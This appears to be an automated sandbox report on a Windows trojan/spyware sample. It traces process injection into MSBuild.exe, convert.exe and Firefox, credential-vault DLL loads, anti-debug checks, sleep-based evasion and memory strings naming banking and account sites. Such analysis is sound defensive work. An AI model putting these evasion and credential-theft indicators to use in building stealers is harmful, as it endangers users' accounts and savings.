Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: *.sln
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@7/5

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9B1ZyhsFUq.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\9B1ZyhsFUq.exe "C:\Users\user\Desktop\9B1ZyhsFUq.exe"
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: scecli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: osuninst.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Code function: 0_2_00007FF7C1934D18 pushad ; iretd	0_2_00007FF7C1934D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004144AD push eax; ret	8_2_004144C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00407823 push D4BE487Bh; retf	8_2_00407829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004142D1 push ecx; ret	8_2_004142D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040D290 push edx; ret	8_2_0040D2CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004073A5 push esi; retf	8_2_004073A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042C4A3 push edi; ret	8_2_0042C4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00403570 push eax; ret	8_2_00403572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00418708 push ecx; retn 7131h	8_2_00418703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004077D2 push eax; ret	8_2_004077D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00417792 pushad ; retf	8_2_004177AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010809AD push ecx; mov dword ptr [esp], ecx	8_2_010809B6
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D47BD7 push edx; ret	10_2_02D47C12
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D520D9 pushad ; retf	10_2_02D520F2
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4216A push D4BE487Bh; retf	10_2_02D42170
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D42119 push eax; ret	10_2_02D4211F
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D41CEC push esi; retf	10_2_02D41CED
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4EC18 push ecx; ret	10_2_02D4EC1B
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4EDF4 push eax; ret	10_2_02D4EE0C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037209AD push ecx; mov dword ptr [esp], ecx	11_2_037209B6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0301421F pushad ; retf	11_2_03014238
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300425F push eax; ret	11_2_03004265
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030042B0 push D4BE487Bh; retf	11_2_030042B6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0301B66D push ecx; iretd	11_2_0301B66E
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03017AB0 push esi; retf	11_2_03017ABA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0301F8F5 push esp; ret	11_2_0301F8F9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03028F30 push edi; ret	11_2_03028F39
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03010F3A push eax; ret	11_2_03010F52
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03003E32 push esi; retf	11_2_03003E33
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03010D5E push ecx; ret	11_2_03010D61
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035C501C push ebp; ret	11_2_035C501E

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD324
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD7E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD944
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD504
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD544
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CD1E4
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418D0154
Source: C:\Windows\SysWOW64\convert.exe	API/Special instruction interceptor: Address: 7FF8418CDA44

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory allocated: 2E40000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Memory allocated: 1B090000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Window / User API: threadDelayed 593	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Window / User API: threadDelayed 400	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Window / User API: threadDelayed 3208	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Window / User API: threadDelayed 6765	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\convert.exe	API coverage: 2.9 %

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe TID: 7740	Thread sleep count: 593 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe TID: 7740	Thread sleep count: 400 > 30	Jump to behavior
Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe TID: 7696	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep count: 3208 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep time: -6416000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep count: 6765 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1412	Thread sleep time: -13530000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe TID: 1240	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\convert.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\convert.exe	Last function: Thread delayed

Source: -16743.11.dr	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: -16743.11.dr	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: -16743.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: -16743.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: -16743.11.dr	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: -16743.11.dr	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: -16743.11.dr	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: -16743.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: -16743.11.dr	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: -16743.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -16743.11.dr	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: -16743.11.dr	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: -16743.11.dr	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2510689368.000000000084F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: -16743.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: -16743.11.dr	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: -16743.11.dr	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: firefox.exe, 00000011.00000002.2015369937.0000023A7020C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^JWP
Source: -16743.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: -16743.11.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: -16743.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: -16743.11.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 9B1ZyhsFUq.exe, 00000000.00000002.1292388752.0000000001348000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: -16743.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: -16743.11.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: -16743.11.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: -16743.11.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
